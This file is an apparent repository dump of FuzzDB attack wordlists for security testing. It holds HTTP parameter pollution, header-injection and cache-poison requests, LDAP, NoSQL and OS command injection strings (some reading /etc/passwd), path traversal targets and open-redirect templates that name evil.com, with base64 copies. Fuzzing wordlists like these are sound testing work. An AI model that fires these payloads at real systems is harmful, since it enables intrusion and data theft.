14 | ?id==1
15 | ?id===1
16 | ;id=1?id=2
17 | ?id;id=1
18 | &id=1;id=2
19 | #id=1?id=2&id=3
20 | ?id=1,2
21 | ?id1,id2=1
22 | ?id[=1&id=2]=3
23 | ?id[&id=2]=1
24 | ?id=[1,2]
25 | ?id&=1
26 | ?id[]=1&id=2
27 | ?id=/:@&=+$&id=2
28 | ?id[=/:@&=+$&id=2]=1
29 | ?id={id:{id:1},2}
30 | ?id[{id:{id[]:1},2}]=3
31 | ?id=%23?id=1
32 | ?id=1%26id=2
33 | ?id=1%2526id=2
34 | ?id=1%c0%a6id=2
35 | ?id=1\uc0a6id=2
36 | ?id=1&id=2
37 | ?id=1&id=2
38 | ?id=1%u0026;id=2
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/hpp.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-header-cache-poison.txt:
--------------------------------------------------------------------------------
1 | # Header Injection / Cache Poison 1.0 (fuzz the entire GET request) (12 April 2010)
2 | # creative commons license http://creativecommons.org/licenses/by/3.0/
3 | # projurl
4 | GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1
5 | %0d%0aX-Injection-Header:%20AttackValue
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-header-cache-poison.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-protocol-methods.txt:
--------------------------------------------------------------------------------
1 | OPTIONS
2 | GET
3 | HEAD
4 | POST
5 | PUT
6 | DELETE
7 | TRACE
8 | TRACK
9 | CONNECT
10 | PROPFIND
11 | PROPPATCH
12 | MKCOL
13 | COPY
14 | MOVE
15 | LOCK
16 | UNLOCK
17 | VERSION-CONTROL
18 | REPORT
19 | CHECKOUT
20 | CHECKIN
21 | UNCHECKOUT
22 | MKWORKSPACE
23 | UPDATE
24 | LABEL
25 | MERGE
26 | BASELINE-CONTROL
27 | MKACTIVITY
28 | ORDERPATCH
29 | ACL
30 | PATCH
31 | SEARCH
32 | ARBITRARY
33 | BCOPY
34 | BDELETE
35 | BMOVE
36 | BPROPFIND
37 | BPROPPATCH
38 | DEBUG
39 | INDEX
40 | NOTIFY
41 | POLL
42 | RPC_IN_DATA
43 | RPC_OUT_DATA
44 | SUBSCRIBE
45 | UNSUBSCRIBE
46 | X-MS-ENUMATTS
47 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-protocol-methods.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-request-header-field-names.txt:
--------------------------------------------------------------------------------
1 | Accept
2 | Accept-Charset
3 | Accept-Encoding
4 | Accept-Language
5 | Accept-Datetime
6 | Authorization
7 | Cache-Control
8 | Connection
9 | Cookie
10 | Content-Length
11 | Content-MD5
12 | Content-Type
13 | Date
14 | Expect
15 | From
16 | Host
17 | If-Match
18 | If-Modified-Since
19 | If-None-Match
20 | If-Range
21 | If-Unmodified-Since
22 | Max-Forwards
23 | Origin
24 | Pragma
25 | Proxy-Authorization
26 | Range
27 | Referer
28 | TE
29 | User-Agent
30 | Upgrade
31 | Via
32 | Warning
33 | X-Requested-With
34 | DNT
35 | X-Forwarded-For
36 | X-Forwarded-Host
37 | X-Forwarded-Proto
38 | Front-End-Https
39 | X-Http-Method-Override
40 | X-ATT-DeviceId
41 | X-Wap-Profile
42 | Proxy-Connection
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-request-header-field-names.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-response-header-field-names.txt:
--------------------------------------------------------------------------------
1 | Access-Control-Allow-Origin
2 | Accept-Ranges
3 | Age
4 | Allow
5 | Cache-Control
6 | Connection
7 | Content-Encoding
8 | Content-Language
9 | Content-Length
10 | Content-Location
11 | Content-MD5
12 | Content-Disposition
13 | Content-Range
14 | Content-Type
15 | Date
16 | ETag
17 | Expires
18 | Last-Modified
19 | Link
20 | Location
21 | P3P
22 | Pragma
23 | Proxy-Authenticate
24 | Refresh
25 | Retry-After
26 | Server
27 | Set-Cookie
28 | Status
29 | Strict-Transport-Security
30 | Trailer
31 | Transfer-Encoding
32 | Upgrade
33 | Vary
34 | Via
35 | Warning
36 | WWW-Authenticate
37 | X-Frame-Options
38 | Public-Key-Pins
39 | X-XSS-Protection
40 | Content-Security-Policy
41 | X-Content-Security-Policy
42 | X-WebKit-CSP
43 | X-Content-Type-Options
44 | X-Powered-By
45 | X-UA-Compatible
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/http-response-header-field-names.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/integer-overflow/integer-overflows.txt:
--------------------------------------------------------------------------------
1 | -1
2 | 0
3 | 0x100
4 | 0x1000
5 | 0x3fffffff
6 | 0x7ffffffe
7 | 0x7fffffff
8 | 0x80000000
9 | 0xfffffffe
10 | 0xffffffff
11 | 0x10000
12 | 0x100000
13 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/integer-overflow/integer-overflows.txt.base64:
--------------------------------------------------------------------------------
1 | LTENCjANCjB4MTAwDQoweDEwMDANCjB4M2ZmZmZmZmYNCjB4N2ZmZmZmZmUNCjB4N2ZmZmZmZmYNCjB4ODAwMDAwMDANCjB4ZmZmZmZmZmUNCjB4ZmZmZmZmZmYNCjB4MTAwMDANCjB4MTAwMDAwDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ip/localhost.txt:
--------------------------------------------------------------------------------
1 | 127.0.0.1
2 | 127.0.0.2
3 | 127.1
4 | 127.2
5 | ::1
6 | 0:0:0:0:0:0:0:1
7 | 0:0:0:000:0:0:0:1
8 | 0000:0000:0000:0000:0000:0000:0000:0001
9 | 2130706433
10 | 2130706434
11 | 7F000001
12 | 7F000002
13 | localhost
14 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ip/localhost.txt.base64:
--------------------------------------------------------------------------------
1 | MTI3LjAuMC4xDQoxMjcuMC4wLjINCjEyNy4xDQoxMjcuMg0KOjoxDQowOjA6MDowOjA6MDowOjENCjA6MDowOjAwMDowOjA6MDoxDQowMDAwOjAwMDA6MDAwMDowMDAwOjAwMDA6MDAwMDowMDAwOjAwMDENCjIxMzA3MDY0MzMNCjIxMzA3MDY0MzQNCjdGMDAwMDAxDQo3RjAwMDAwMg0KbG9jYWxob3N0DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ldap/README.md:
--------------------------------------------------------------------------------
1 | tool:
2 | http://code.google.com/p/ldap-blind-explorer/
3 |
4 | video:
5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ldap/ldap-injection.txt:
--------------------------------------------------------------------------------
1 | !
2 | %21
3 | %26
4 | %28
5 | %29
6 | %2A%28%7C%28mail%3D%2A%29%29
7 | %2A%28%7C%28objectclass%3D%2A%29%29
8 | %2A%7C
9 | %7C
10 | \21
11 | \26
12 | \28
13 | \29
14 | &
15 | (
16 | )
17 | *
18 | *()|%26'
19 | *()|&'
20 | *(|(mail=*))
21 | *(|(objectclass=*))
22 | *)(uid=*))(|(uid=*
23 | (*)*)
24 | *)*
25 | */*
26 | *|
27 | /
28 | //
29 | //*
30 | @*
31 | |
32 | admin*
33 | admin*)((|userpassword=*)
34 | admin*)((|userPassword=*)
35 | x' or name()='username' or 'x'='y
36 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/ldap/ldap-injection.txt.base64:
--------------------------------------------------------------------------------
1 | IQ0KJTIxDQolMjYNCiUyOA0KJTI5DQolMkElMjglN0MlMjhtYWlsJTNEJTJBJTI5JTI5DQolMkElMjglN0MlMjhvYmplY3RjbGFzcyUzRCUyQSUyOSUyOQ0KJTJBJTdDDQolN0MNClwyMQ0KXDI2DQpcMjgNClwyOQ0KJg0KKA0KKQ0KKg0KKigpfCUyNicNCiooKXwmJw0KKih8KG1haWw9KikpDQoqKHwob2JqZWN0Y2xhc3M9KikpDQoqKSh1aWQ9KikpKHwodWlkPSoNCigqKSopDQoqKSoNCiovKg0KKnwNCi8NCi8vDQovLyoNCkAqDQp8DQphZG1pbioNCmFkbWluKikoKHx1c2VycGFzc3dvcmQ9KikNCmFkbWluKikoKHx1c2VyUGFzc3dvcmQ9KikNCngnIG9yIG5hbWUoKT0ndXNlcm5hbWUnIG9yICd4Jz0neQ0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-ms-httpd-log-locations.txt:
--------------------------------------------------------------------------------
1 | \Program Files\Apache Group\Apache\logs\access.log
2 | \Program Files\Apache Group\Apache\logs\error.log
3 | \Program Files\Apache Group\Apache\conf\httpd.conf
4 | \Program Files\Apache Group\Apache2\conf\httpd.conf
5 | \Program Files (x86)\Apache Group\Apache\logs\access.log
6 | \Program Files (x86)\Apache Group\Apache\logs\error.log
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-ms-httpd-log-locations.txt.base64:
--------------------------------------------------------------------------------
1 | XFByb2dyYW0gRmlsZXNcQXBhY2hlIEdyb3VwXEFwYWNoZVxsb2dzXGFjY2Vzcy5sb2cNClxQcm9ncmFtIEZpbGVzXEFwYWNoZSBHcm91cFxBcGFjaGVcbG9nc1xlcnJvci5sb2cNClxQcm9ncmFtIEZpbGVzXEFwYWNoZSBHcm91cFxBcGFjaGVcY29uZlxodHRwZC5jb25mDQpcUHJvZ3JhbSBGaWxlc1xBcGFjaGUgR3JvdXBcQXBhY2hlMlxjb25mXGh0dHBkLmNvbmYNClxQcm9ncmFtIEZpbGVzICh4ODYpXEFwYWNoZSBHcm91cFxBcGFjaGVcbG9nc1xhY2Nlc3MubG9nDQpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxBcGFjaGUgR3JvdXBcQXBhY2hlXGxvZ3NcZXJyb3IubG9nDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-unix-httpd-log-locations.txt:
--------------------------------------------------------------------------------
1 | /apache/logs/error.log
2 | /apache/logs/access.log
3 | /apache/logs/error.log
4 | /apache/logs/access.log
5 | /apache/logs/error.log
6 | /apache/logs/access.log
7 | /etc/httpd/logs/acces_log
8 | /etc/httpd/logs/acces.log
9 | /etc/httpd/logs/error_log
10 | /etc/httpd/logs/error.log
11 | /var/www/logs/access_log
12 | /var/www/logs/access.log
13 | /usr/local/apache/logs/access_log
14 | /usr/local/apache/logs/access.log
15 | /var/log/apache/access_log
16 | /var/log/apache2/access_log
17 | /var/log/apache/access.log
18 | /var/log/apache2/access.log
19 | /var/log/access_log
20 | /var/log/access.log
21 | /var/www/logs/error_log
22 | /var/www/logs/error.log
23 | /usr/local/apache/logs/error_log
24 | /usr/local/apache/logs/error.log
25 | /var/log/apache/error_log
26 | /var/log/apache2/error_log
27 | /var/log/apache/error.log
28 | /var/log/apache2/error.log
29 | /var/log/error_log
30 | /var/log/error.log
31 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/lfi/common-unix-httpd-log-locations.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/no-sql-injection/Readme.md:
--------------------------------------------------------------------------------
1 | NoSQL Hacking Docs
2 | ==================
3 | - https://www.owasp.org/index.php/Testing_for_NoSQL_injection
4 | - https://arxiv.org/pdf/1506.04082.pdf
5 | - https://pentesterlab.com/exercises/web_for_pentester_II/course
6 | - https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_sql_and_nosql_injection.html
7 | - https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf
8 | - http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
9 |
10 | NoSQL Hacking Tools
11 | ===================
12 | - http://nosqlmap.net/index.html
13 |
14 | Credits
15 | =======
16 | Thanks to https://github.com/cr0hn/nosqlinjection_wordlists for starting this wordlist
17 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/no-sql-injection/mongodb.txt:
--------------------------------------------------------------------------------
1 | true, $where: '1 == 1'
2 | , $where: '1 == 1'
3 | $where: '1 == 1'
4 | ', $where: '1 == 1'
5 | 1, $where: '1 == 1'
6 | { $ne: 1 }
7 | ', $or: [ {}, { 'a':'a
8 | ' } ], $comment:'successful MongoDB injection'
9 | db.injection.insert({success:1});
10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
11 | || 1==1
12 | ' && this.password.match(/.*/)//+%00
13 | ' && this.passwordzz.match(/.*/)//+%00
14 | '%20%26%26%20this.password.match(/.*/)//+%00
15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00
16 | {$gt: ''}
17 | [$ne]=1
18 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/no-sql-injection/mongodb.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/OSCommandInject.Windows.txt:
--------------------------------------------------------------------------------
1 | +|+Dir+c:\
2 | $+|+Dir+c:\
3 | %26%26+|+dir c:\
4 | $%26%26dir c:\
5 | %0a+dir+c:\
6 | +|+Dir+c:%255c
7 | $+|+Dir+c:%255c
8 | %26%26+|+dir c:%255c
9 | $%26%26dir+c:%255c
10 | %0a+dir+c:%255c
11 | +|+Dir+c:%2f
12 | $+|+Dir+c:%2f
13 | %26%26+|+dir c:%2f
14 | $%26%26dir+c:%2f
15 | %0a+dir+c:%2f
16 | +dir+c:\+|
17 | +|+dir+c:\+|
18 | +|+dir+c:%2f+|
19 | dir+c:\
20 | ||+dir|c:\
21 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/OSCommandInject.Windows.txt.base64:
--------------------------------------------------------------------------------
1 | K3wrRGlyK2M6XA0KJCt8K0RpcitjOlwNCiUyNiUyNit8K2RpciBjOlwNCiQlMjYlMjZkaXIgYzpcDQolMGErZGlyK2M6XA0KK3wrRGlyK2M6JTI1NWMNCiQrfCtEaXIrYzolMjU1Yw0KJTI2JTI2K3wrZGlyIGM6JTI1NWMNCiQlMjYlMjZkaXIrYzolMjU1Yw0KJTBhK2RpcitjOiUyNTVjDQorfCtEaXIrYzolMmYNCiQrfCtEaXIrYzolMmYNCiUyNiUyNit8K2RpciBjOiUyZg0KJCUyNiUyNmRpcitjOiUyZg0KJTBhK2RpcitjOiUyZg0KK2RpcitjOlwrfA0KK3wrZGlyK2M6XCt8DQorfCtkaXIrYzolMmYrfA0KZGlyK2M6XA0KfHwrZGlyfGM6XA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/command-execution-unix.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 | /index.html|id|
4 | ;id;
5 | ;id
6 | ;netstat -a;
7 | ;id;
8 | |id
9 | |/usr/bin/id
10 | |id|
11 | |/usr/bin/id|
12 | ||/usr/bin/id|
13 | |id;
14 | ||/usr/bin/id;
15 | ;id|
16 | ;|/usr/bin/id|
17 | \n/bin/ls -al\n
18 | \n/usr/bin/id\n
19 | \nid\n
20 | \n/usr/bin/id;
21 | \nid;
22 | \n/usr/bin/id|
23 | \nid|
24 | ;/usr/bin/id\n
25 | ;id\n
26 | |usr/bin/id\n
27 | |nid\n
28 | `id`
29 | `/usr/bin/id`
30 | a);id
31 | a;id
32 | a);id;
33 | a;id;
34 | a);id|
35 | a;id|
36 | a)|id
37 | a|id
38 | a)|id;
39 | a|id
40 | |/bin/ls -al
41 | a);/usr/bin/id
42 | a;/usr/bin/id
43 | a);/usr/bin/id;
44 | a;/usr/bin/id;
45 | a);/usr/bin/id|
46 | a;/usr/bin/id|
47 | a)|/usr/bin/id
48 | a|/usr/bin/id
49 | a)|/usr/bin/id;
50 | a|/usr/bin/id
51 | ;system('cat%20/etc/passwd')
52 | ;system('id')
53 | ;system('/usr/bin/id')
54 | %0Acat%20/etc/passwd
55 | %0A/usr/bin/id
56 | %0Aid
57 | %0A/usr/bin/id%0A
58 | %0Aid%0A
59 | & ping -i 30 127.0.0.1 &
60 | & ping -n 30 127.0.0.1 &
61 | %0a ping -i 30 127.0.0.1 %0a
62 | `ping 127.0.0.1`
63 | | id
64 | & id
65 | ; id
66 | %0a id %0a
67 | `id`
68 | $;/usr/bin/id
69 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/command-injection-template.txt:
--------------------------------------------------------------------------------
1 | {cmd}
2 | ;{cmd}
3 | ;{cmd};
4 | ^{cmd}
5 | |{cmd}
6 | <{cmd}
7 | <{cmd};
8 | <{cmd}\n
9 | <{cmd}%0D
10 | <{cmd}%0A
11 | &{cmd}
12 | &{cmd}&
13 | &&{cmd}
14 | &&{cmd}&&
15 | %0D{cmd}
16 | %0D{cmd}%0D
17 | %0A{cmd}
18 | %0A{cmd}%0A
19 | \n{cmd}
20 | \n{cmd}\n
21 | '{cmd}'
22 | `{cmd}`
23 | ;{cmd}|
24 | ;{cmd}/n
25 | |{cmd};
26 | a);{cmd}
27 | a;{cmd}
28 | a);{cmd}
29 | a;{cmd};
30 | a);{cmd}|
31 | FAIL||{cmd}
32 | CMD=$'{cmd}';$CMD
33 | ;CMD=$'{cmd}';$CMD
34 | ^CMD=$'{cmd}';$CMD
35 | |CMD=$'{cmd}';$CMD
36 | &CMD=$'{cmd}';$CMD
37 | &&CMD=$'{cmd}';$CMD
38 | %0DCMD=$'{cmd}';$CMD
39 | FAIL||CMD=$'{cmd}';$CMD
40 | CMD=$\'{cmd}\';$CMD
41 | ;CMD=$\'{cmd}\';$CMD
42 | ^CMD=$\'{cmd}\';$CMD
43 | |CMD=$\'{cmd}\';$CMD
44 | &CMD=$\'{cmd}\';$CMD
45 | &&CMD=$\'{cmd}\';$CMD
46 | %0DCMD=$\'{cmd}\';$CMD
47 | FAIL||CMD=$\'{cmd}\';$CMD
48 | CMD=$"{cmd}";$CMD
49 | ;CMD=$"{cmd}";$CMD
50 | ^CMD=$"{cmd}";$CMD
51 | |CMD=$"{cmd}";$CMD
52 | &CMD=$"{cmd}";$CMD
53 | &&CMD=$"{cmd}";$CMD
54 | %0DCMD=$"{cmd}";$CMD
55 | FAIL||CMD=$"{cmd}";$CMD
56 |
57 | ;system('{cmd}')
58 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/command-injection-template.txt.base64:
--------------------------------------------------------------------------------
1 | e2NtZH0NCjt7Y21kfQ0KO3tjbWR9Ow0KXntjbWR9DQp8e2NtZH0NCjx7Y21kfQ0KPHtjbWR9Ow0KPHtjbWR9XG4NCjx7Y21kfSUwRA0KPHtjbWR9JTBBDQome2NtZH0NCiZ7Y21kfSYNCiYme2NtZH0NCiYme2NtZH0mJg0KJTBEe2NtZH0NCiUwRHtjbWR9JTBEDQolMEF7Y21kfQ0KJTBBe2NtZH0lMEENClxue2NtZH0NClxue2NtZH1cbg0KJ3tjbWR9Jw0KYHtjbWR9YA0KO3tjbWR9fA0KO3tjbWR9L24NCnx7Y21kfTsNCmEpO3tjbWR9DQphO3tjbWR9DQphKTt7Y21kfQ0KYTt7Y21kfTsNCmEpO3tjbWR9fA0KRkFJTHx8e2NtZH0NCkNNRD0kJ3tjbWR9JzskQ01EDQo7Q01EPSQne2NtZH0nOyRDTUQNCl5DTUQ9JCd7Y21kfSc7JENNRA0KfENNRD0kJ3tjbWR9JzskQ01EDQomQ01EPSQne2NtZH0nOyRDTUQNCiYmQ01EPSQne2NtZH0nOyRDTUQNCiUwRENNRD0kJ3tjbWR9JzskQ01EDQpGQUlMfHxDTUQ9JCd7Y21kfSc7JENNRA0KQ01EPSRcJ3tjbWR9XCc7JENNRA0KO0NNRD0kXCd7Y21kfVwnOyRDTUQNCl5DTUQ9JFwne2NtZH1cJzskQ01EDQp8Q01EPSRcJ3tjbWR9XCc7JENNRA0KJkNNRD0kXCd7Y21kfVwnOyRDTUQNCiYmQ01EPSRcJ3tjbWR9XCc7JENNRA0KJTBEQ01EPSRcJ3tjbWR9XCc7JENNRA0KRkFJTHx8Q01EPSRcJ3tjbWR9XCc7JENNRA0KQ01EPSQie2NtZH0iOyRDTUQNCjtDTUQ9JCJ7Y21kfSI7JENNRA0KXkNNRD0kIntjbWR9IjskQ01EDQp8Q01EPSQie2NtZH0iOyRDTUQNCiZDTUQ9JCJ7Y21kfSI7JENNRA0KJiZDTUQ9JCJ7Y21kfSI7JENNRA0KJTBEQ01EPSQie2NtZH0iOyRDTUQNCkZBSUx8fENNRD0kIntjbWR9IjskQ01EDQo8IS0tI2V4ZWMgY21kPSJ7Y21kfSItLT4NCjtzeXN0ZW0oJ3tjbWR9JykNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-delimiters.txt:
--------------------------------------------------------------------------------
1 | ;
2 | ^
3 | &
4 | &&
5 | |
6 | ||
7 | %0D
8 | %0A
9 | \n
10 | <
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-delimiters.txt.base64:
--------------------------------------------------------------------------------
1 | Ow0KXg0KJg0KJiYNCnwNCnx8DQolMEQNCiUwQQ0KXG4NCjwNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-operators.txt:
--------------------------------------------------------------------------------
1 | <
2 | >
3 | <<
4 | >>
5 | <>
6 | >|
7 | |
8 | ||
9 | &
10 | &&
11 | $
12 | ;
13 | &>
14 | &>>
15 | <<<
16 | >>>
17 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-operators.txt.base64:
--------------------------------------------------------------------------------
1 | PA0KPg0KPDwNCj4+DQo8Pg0KPnwNCnwNCnx8DQomDQomJg0KJA0KOw0KJj4NCiY+Pg0KPDw8DQo+Pj4NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt:
--------------------------------------------------------------------------------
1 | ..%255c
2 | .%5c../..%5c
3 | /..%c0%9v../
4 | /..%c0%af../
5 | /..%255c..%255c
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt.base64:
--------------------------------------------------------------------------------
1 | Li4lMjU1Yw0KLiU1Yy4uLy4uJTVjDQovLi4lYzAlOXYuLi8NCi8uLiVjMCVhZi4uLw0KLy4uJTI1NWMuLiUyNTVjDQoNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-unix.txt:
--------------------------------------------------------------------------------
1 | uname -n -s
2 | whoami
3 | pwd
4 | last
5 | cat /etc/passwd
6 | ls -la /tmp
7 | ls -la /home
8 | ping -i 30 127.0.0.1
9 | ping 127.0.0.1
10 | ping -n 30
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-unix.txt.base64:
--------------------------------------------------------------------------------
1 | dW5hbWUgLW4gLXMNCndob2FtaQ0KcHdkDQpsYXN0DQpjYXQgL2V0Yy9wYXNzd2QNCmxzIC1sYSAvdG1wDQpscyAtbGEgL2hvbWUNCnBpbmcgLWkgMzAgMTI3LjAuMC4xIA0KcGluZyAxMjcuMC4wLjENCnBpbmcgLW4gMzANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-windows.txt:
--------------------------------------------------------------------------------
1 | ver
2 | chdir
3 | echo %USERNAME%
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-windows.txt.base64:
--------------------------------------------------------------------------------
1 | dmVyDQpjaGRpcg0KZWNobyAlVVNFUk5BTUUlDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-dir-indexing/directory-indexing.txt:
--------------------------------------------------------------------------------
1 | ;dir
2 | `dir`
3 | |dir|
4 | |dir
5 | /%3f.jsp
6 | ?M=D
7 | ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-dir-indexing/directory-indexing.txt.base64:
--------------------------------------------------------------------------------
1 | O2Rpcg0KYGRpcmANCnxkaXJ8DQp8ZGlyDQovJTNmLmpzcA0KP009RA0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/path-traversal/README.md:
--------------------------------------------------------------------------------
1 |
2 | **traversals-8-deep-exotic-encoding.fuzz.txt**
3 |
4 | Use Regex to replace {FILE} with your target filename
5 |
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/path-traversal/path-traversal-windows.txt:
--------------------------------------------------------------------------------
1 | C:/inetpub/wwwroot/global.asa
2 | C:\inetpub\wwwroot\global.asa
3 | C:/boot.ini
4 | C:\boot.ini
5 | D:\inetpub\wwwroot\global.asa
6 | D:/inetpub/wwwroot/global.asa
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/path-traversal/path-traversal-windows.txt.base64:
--------------------------------------------------------------------------------
1 | QzovaW5ldHB1Yi93d3dyb290L2dsb2JhbC5hc2ENCkM6XGluZXRwdWJcd3d3cm9vdFxnbG9iYWwuYXNhDQpDOi9ib290LmluaQ0KQzpcYm9vdC5pbmkNCkQ6XGluZXRwdWJcd3d3cm9vdFxnbG9iYWwuYXNhDQpEOi9pbmV0cHViL3d3d3Jvb3QvZ2xvYmFsLmFzYQ0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/README.md:
--------------------------------------------------------------------------------
1 | * redirect-injection-template.txt
2 | * Patterns for injecting into a value in an attempt to bypass many input validation filters that are intended to allow only relative links on the same origin.
3 | * redirect-urls-template.txt
4 | * URL patterns that commonly lead to open redirect.
5 |
6 | Usage:
7 | Replace {target} in the files with an IP address or a hostname and path. Examples:
8 | * evil.com
9 | * evil.com/badurl
10 | * 1.2.3.4
11 | * 134744072
12 |
13 | Testing techniques:
14 | Filter Bypass
15 | * If periods are being stripped by the filter so that evil.com becomes evilcom, try converting the ip address to decimal notation form.
16 | http://www.geektools.com/geektools-cgi/ipconv.cgi
17 | * Try URL-encoding the replacement value for {target}
18 | Other Issues
19 | * If redirect-injection-template.txt usage results in the server proxying a request to the injected URL and returning its contents instead of redirecting to it, explore how this could be used to explore the server's localhost ports for web services, protected systems in a DMZ, interact through GET requests/REST interfaces, etc.
20 |
21 | TODO
22 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-injection-template.txt:
--------------------------------------------------------------------------------
1 | {target}
2 | /{target}
3 | //{target}
4 | ///{target}
5 | ////{target}
6 | /\{target}
7 | %2f{target}
8 | %2f$2f{target}
9 | %2f{target}%2f%2f
10 | $2f%2f{target}%2f%2f
11 | %2f{target}//
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-injection-template.txt.base64:
--------------------------------------------------------------------------------
1 | e3RhcmdldH0NCi97dGFyZ2V0fQ0KLy97dGFyZ2V0fQ0KLy8ve3RhcmdldH0NCi8vLy97dGFyZ2V0fQ0KL1x7dGFyZ2V0fQ0KJTJme3RhcmdldH0NCiUyZiQyZnt0YXJnZXR9DQolMmZ7dGFyZ2V0fSUyZiUyZg0KJDJmJTJme3RhcmdldH0lMmYlMmYNCiUyZnt0YXJnZXR9Ly8NCg==
2 |
